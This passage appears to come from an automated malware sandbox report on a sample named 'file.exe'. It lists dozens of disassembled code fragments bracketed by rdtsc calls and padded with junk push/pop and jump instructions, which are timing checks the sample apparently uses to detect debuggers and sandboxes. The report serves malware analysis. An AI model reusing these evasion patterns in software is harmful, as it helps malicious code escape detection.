                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10257EF second address: 1025803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007F389CFCC946h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025803 second address: 1025824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b jmp 00007F389C8383A6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025824 second address: 102583E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F389CFCC946h 0x0000000a jmp 00007F389CFCC950h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033320 second address: 1033324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033324 second address: 1033332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033332 second address: 103334A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103334A second address: 1033354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F389CFCC946h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10364EF second address: 10364F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036640 second address: 1036644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036644 second address: 103664A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103664A second address: 1036650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042C61 second address: 1042C67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046737 second address: 104673D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104673D second address: 1046755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F389C83839Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F389C838396h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F2AF second address: F5F2B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048CE0 second address: 1048CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048CE4 second address: 1048CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EC42 second address: 104EC57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F389C83839Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EDB5 second address: 104EDCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F0AB second address: 104F0C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F389C83839Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052DED second address: 1052E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389CFCC952h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052938 second address: 105293E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105293E second address: 105294B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F389CFCC948h 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105294B second address: 1052963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389C8383A2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052963 second address: 1052967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052AF3 second address: 1052B47 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F389C838396h 0x00000008 jmp 00007F389C8383A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F389C8383A7h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F389C8383A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052B47 second address: 1052B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065598 second address: 10655BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F389C8383A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F389C8383A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655BD second address: 10655C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655C3 second address: 10655EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F389C8383A0h 0x0000000e jnl 00007F389C838396h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 je 00007F389C83839Eh 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655EF second address: 1065617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 jmp 00007F389CFCC952h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnp 00007F389CFCC952h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106095D second address: 1060962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060962 second address: 106096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F389CFCC946h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106096D second address: 1060975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060975 second address: 106097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072524 second address: 107253A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C83839Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107253A second address: 1072540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107220F second address: 1072269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F389C8383A5h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F389C838396h 0x00000013 jnc 00007F389C838396h 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007F389C838396h 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F389C8383A8h 0x00000028 jmp 00007F389C83839Bh 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B195 second address: 108B19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B19B second address: 108B1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B1A6 second address: 108B1AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B5F0 second address: 108B600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F389C838396h 0x0000000a jp 00007F389C838396h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B600 second address: 108B619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC955h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B619 second address: 108B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F389C8383A1h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B632 second address: 108B636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108BA11 second address: 108BA2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F389C8383A1h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108BA2D second address: 108BA46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Fh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108BA46 second address: 108BA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F389C838396h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108BEA7 second address: 108BEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC94Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C02A second address: 108C02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C02E second address: 108C034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D8C5 second address: 108D913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389C83839Bh 0x00000010 pushad 0x00000011 js 00007F389C838396h 0x00000017 jmp 00007F389C8383A9h 0x0000001c ja 00007F389C838396h 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091868 second address: 109186C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B6F second address: 1091B75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F58 second address: 1091F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F5E second address: 1091F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F62 second address: 1091F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F66 second address: 1091FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F389C8383A4h 0x0000000e nop 0x0000000f call 00007F389C8383A8h 0x00000014 mov dword ptr [ebp+122D1934h], edi 0x0000001a pop edx 0x0000001b push dword ptr [ebp+122D2E37h] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+124836A6h], edi 0x00000028 mov edi, 7A270D2Ah 0x0000002d popad 0x0000002e push 67D16FBBh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091FC0 second address: 1091FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC953h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935B9 second address: 10935BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30D12 second address: 4E30D86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389CFCC957h 0x00000009 sbb si, D94Eh 0x0000000e jmp 00007F389CFCC959h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F389CFCC94Ah 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 jmp 00007F389CFCC94Eh 0x00000027 jmp 00007F389CFCC952h 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80007 second address: 4E8005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, eax 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F389C8383A9h 0x00000015 pushfd 0x00000016 jmp 00007F389C8383A0h 0x0000001b and cx, 3658h 0x00000020 jmp 00007F389C83839Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8005C second address: 4E80074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC954h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80074 second address: 4E80078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80078 second address: 4E8009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F389CFCC94Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F389CFCC94Ch 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10100 second address: 4E1012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F389C8383A5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F389C83839Dh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1012D second address: 4E1014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F389CFCC953h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, eax 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1014F second address: 4E10188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 2312FF51h 0x0000000e popad 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, 158D57BCh 0x0000001a jmp 00007F389C8383A5h 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10188 second address: 4E1018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1018D second address: 4E101CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b jmp 00007F389C8383A4h 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F389C8383A8h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E101F6 second address: 4E101FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E101FA second address: 4E10200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30A6E second address: 4E30A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30A83 second address: 4E30A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30A89 second address: 4E30A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30A8D second address: 4E30AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F389C8383A6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F389C8383A7h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E305B0 second address: 4E30620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F389CFCC94Ah 0x00000011 pop eax 0x00000012 mov bx, 4F76h 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F389CFCC957h 0x0000001d sub esi, 5E6CAFFEh 0x00000023 jmp 00007F389CFCC959h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F389CFCC94Ch 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30343 second address: 4E30347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30347 second address: 4E30362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC957h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30362 second address: 4E303BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ax, 1B77h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov ax, 026Fh 0x00000012 pushad 0x00000013 mov dh, ch 0x00000015 jmp 00007F389C8383A7h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F389C8383A9h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F389C83839Dh 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E303BA second address: 4E303C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E401B5 second address: 4E401CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 600486B4h 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E401CA second address: 4E401D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70F1D second address: 4E70F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70F23 second address: 4E70F98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389CFCC958h 0x00000009 sub ecx, 0D176818h 0x0000000f jmp 00007F389CFCC94Bh 0x00000014 popfd 0x00000015 call 00007F389CFCC958h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ebp 0x0000001f jmp 00007F389CFCC94Eh 0x00000024 mov dword ptr [esp], ebp 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F389CFCC94Eh 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70F98 second address: 4E70FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70FA7 second address: 4E70FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70FAD second address: 4E70FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5047D second address: 4E50482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50482 second address: 4E504BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F389C83839Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F389C8383A6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E504BC second address: 4E504C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
